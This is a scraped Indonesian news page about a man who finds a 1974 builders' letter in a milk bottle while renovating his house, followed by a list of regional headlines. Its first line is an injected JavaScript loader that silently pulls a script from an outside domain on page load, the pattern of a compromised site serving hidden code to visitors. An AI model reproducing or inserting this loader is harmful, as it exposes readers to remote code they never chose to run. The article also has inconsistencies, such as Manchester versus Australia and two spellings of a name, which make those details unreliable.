(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
INTERNASIONAL

Pria Ini Temukan Harta Karun Berumur Setengah Abad Saat Renovasi Rumah


KANALKALIMANTAN.COM – Seorang pria di Manchester, Matt Streatfeild menemukan harta karun berupa surat lawas dari tahun 1974 saat ia sedang merenovasi rumah.

Matt mengatakan surat berisi tulisan tangan itu ada di dalam botol susu yang terbuat dari kaca dan terjepit di antara dua dinding di rumahnya.

Menyadur 9News Jumat (12/11/2021), surat itu tertanggal 5 April 1974, dari tukang yang membangun tembok yang sedang dirobohkannya.

“Anda selalu mendengar legenda pesan dalam botol, tapi tidak pernah berpikir akan menemukan satu di antara dua dinding di rumah Anda sendiri,” kata Streatfeild kepada NBN News.

 

Harta karun berupa surat berumur setengah abad. Foto : 9News vis NBN News

Baca juga : Jokowi Disindir Soal Banjir Sintang, Hasto: Fadli Zon Cuma Bisa Kritik!

Penasaran untuk mengetahui lebih lanjut, pemilik rumah melacak salah satu penulis asli dari catatan tersebut, Ron Niddrie yang berusia 66 tahun.

“Salah satu kenang-kenangan kecil ini telah terbayar,” kata Middrie. “Fakta bahwa itu terjadi 47 tahun yang lalu bahkan lebih mengejutkan.”

Surat itu memberikan gambaran tentang seperti apa kehidupan di Australia saat itu.

Renovasi itu sedang dalam proses konversi dari sistem pengukuran imperial ke metrik dan botol susu itu sendiri adalah salah satu yang pertama memiliki milimeter yang tercantum pada labelnya.

 

Baca juga : Tarik Warga Lewat Vaksinasi Berhadiah Sepeda Motor, Warga Juai Antusias

Perdagangan menulis bahwa mereka sedang menunggu upah mingguan sebesar AUD 106 atau setara Rp 1 juta dari Newcastle Interior Linings, perusahaan yang masih ada sampai sekarang.

Streatfeild mengatakan ketika tembok itu direkonstruksi, dia akan mengembalikan botol aslinya, serta kenang-kenangannya sendiri.

“Ketika kami melapisi kembali dinding ini, kami akan menempatkan botol lama yang kami temukan dari tahun 1974 dengan bagian sejarah itu, dan kami akan menambahkan milik kami sendiri,” katanya. (Suara.com)

Editor : Suara


Desy Arfianty

Recent Posts

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

1 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

2 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

4 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

4 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

4 jam ago

This website uses cookies.